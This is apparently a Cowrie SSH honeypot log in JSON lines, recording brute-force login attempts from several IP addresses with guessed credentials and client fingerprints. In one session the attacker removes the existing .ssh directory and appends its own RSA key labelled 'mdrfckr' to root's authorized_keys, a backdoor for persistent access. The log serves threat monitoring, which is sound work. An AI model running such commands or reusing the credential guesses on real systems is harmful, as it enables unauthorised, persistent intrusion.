{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56854,"dst_ip":"1.2.3.4","dst_port":22,"session":"2cd3365a4391","protocol":"ssh","message":"New connection: 212.227.235.229:56854 (1.2.3.4:22) [session: 2cd3365a4391]","sensor":"my-vps","timestamp":"2025-09-08T12:43:58.410759Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:43:58.411627Z","src_ip":"212.227.235.229","session":"2cd3365a4391"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:43:58.542678Z","src_ip":"212.227.235.229","session":"2cd3365a4391"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:43:59.106796Z","src_ip":"212.227.235.229","session":"2cd3365a4391"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:44:00.240297Z","src_ip":"212.227.235.229","session":"2cd3365a4391"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57774,"dst_ip":"1.2.3.4","dst_port":22,"session":"02f0686b1342","protocol":"ssh","message":"New connection: 212.227.235.229:57774 (1.2.3.4:22) [session: 02f0686b1342]","sensor":"my-vps","timestamp":"2025-09-08T12:44:00.371212Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:44:00.371954Z","src_ip":"212.227.235.229","session":"02f0686b1342"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:44:00.503349Z","src_ip":"212.227.235.229","session":"02f0686b1342"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:44:01.071528Z","src_ip":"212.227.235.229","session":"02f0686b1342"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:44:01.204902Z","src_ip":"212.227.235.229","session":"02f0686b1342"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:44:01.205908Z","src_ip":"212.227.235.229","session":"80e435939a06"}
{"eventid":"cowrie.session.connect","src_ip":"45.78.196.182","src_port":50796,"dst_ip":"1.2.3.4","dst_port":22,"session":"db43702df1f6","protocol":"ssh","message":"New connection: 45.78.196.182:50796 (1.2.3.4:22) [session: db43702df1f6]","sensor":"my-vps","timestamp":"2025-09-08T12:44:18.742232Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:44:18.743036Z","src_ip":"45.78.196.182","session":"db43702df1f6"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-08T12:44:18.932790Z","src_ip":"45.78.196.182","session":"db43702df1f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37976,"dst_ip":"1.2.3.4","dst_port":22,"session":"199de3e7b57c","protocol":"ssh","message":"New connection: 212.227.235.229:37976 (1.2.3.4:22) [session: 199de3e7b57c]","sensor":"my-vps","timestamp":"2025-09-08T12:44:24.360688Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:44:24.361597Z","src_ip":"212.227.235.229","session":"199de3e7b57c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:44:24.523441Z","src_ip":"212.227.235.229","session":"199de3e7b57c"}
{"eventid":"cowrie.login.failed","username":"init","password":"init.123","message":"login attempt [init/init.123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:44:25.184041Z","src_ip":"212.227.235.229","session":"199de3e7b57c"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:44:26.350010Z","src_ip":"212.227.235.229","session":"199de3e7b57c"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:44:26.742829Z","src_ip":"45.78.196.182","session":"db43702df1f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51236,"dst_ip":"1.2.3.4","dst_port":22,"session":"897ee39a251e","protocol":"ssh","message":"New connection: 212.227.235.229:51236 (1.2.3.4:22) [session: 897ee39a251e]","sensor":"my-vps","timestamp":"2025-09-08T12:44:28.591073Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:44:28.591803Z","src_ip":"212.227.235.229","session":"897ee39a251e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:44:28.889651Z","src_ip":"212.227.235.229","session":"897ee39a251e"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia.123","message":"login attempt [nvidia/nvidia.123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:44:30.115654Z","src_ip":"212.227.235.229","session":"897ee39a251e"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:44:31.415874Z","src_ip":"212.227.235.229","session":"897ee39a251e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43756,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6f73cbe2753","protocol":"ssh","message":"New connection: 212.227.235.229:43756 (1.2.3.4:22) [session: e6f73cbe2753]","sensor":"my-vps","timestamp":"2025-09-08T12:44:42.694903Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:44:42.695740Z","src_ip":"212.227.235.229","session":"e6f73cbe2753"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:44:42.955812Z","src_ip":"212.227.235.229","session":"e6f73cbe2753"}
{"eventid":"cowrie.login.failed","username":"john","password":"Password","message":"login attempt [john/Password] failed","sensor":"my-vps","timestamp":"2025-09-08T12:44:44.040293Z","src_ip":"212.227.235.229","session":"e6f73cbe2753"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:44:45.302346Z","src_ip":"212.227.235.229","session":"e6f73cbe2753"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":38786,"dst_ip":"1.2.3.4","dst_port":22,"session":"05db946c1b8e","protocol":"ssh","message":"New connection: 139.59.14.27:38786 (1.2.3.4:22) [session: 05db946c1b8e]","sensor":"my-vps","timestamp":"2025-09-08T12:44:48.794704Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:44:48.795690Z","src_ip":"139.59.14.27","session":"05db946c1b8e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:44:49.162847Z","src_ip":"139.59.14.27","session":"05db946c1b8e"}
{"eventid":"cowrie.login.success","username":"root","password":"woshizhang","message":"login attempt [root/woshizhang] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:44:50.658783Z","src_ip":"139.59.14.27","session":"05db946c1b8e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:44:51.426512Z","src_ip":"139.59.14.27","session":"05db946c1b8e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:44:51.427360Z","src_ip":"139.59.14.27","session":"05db946c1b8e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:44:51.428625Z","src_ip":"139.59.14.27","session":"05db946c1b8e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:44:51.808965Z","src_ip":"139.59.14.27","session":"05db946c1b8e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:44:52.631576Z","src_ip":"139.59.14.27","session":"05db946c1b8e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:44:52.632238Z","src_ip":"139.59.14.27","session":"05db946c1b8e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:44:53.004602Z","src_ip":"139.59.14.27","session":"05db946c1b8e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:44:53.005799Z","src_ip":"139.59.14.27","session":"05db946c1b8e"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":43404,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca655d0b7ce7","protocol":"ssh","message":"New connection: 139.59.14.27:43404 (1.2.3.4:22) [session: ca655d0b7ce7]","sensor":"my-vps","timestamp":"2025-09-08T12:44:53.326242Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:44:53.327168Z","src_ip":"139.59.14.27","session":"ca655d0b7ce7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:44:53.655988Z","src_ip":"139.59.14.27","session":"ca655d0b7ce7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:44:55.047069Z","src_ip":"139.59.14.27","session":"ca655d0b7ce7"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:44:56.384816Z","src_ip":"139.59.14.27","session":"ca655d0b7ce7"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":43418,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e82313a9371","protocol":"ssh","message":"New connection: 139.59.14.27:43418 (1.2.3.4:22) [session: 4e82313a9371]","sensor":"my-vps","timestamp":"2025-09-08T12:44:56.695821Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:44:56.696703Z","src_ip":"139.59.14.27","session":"4e82313a9371"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 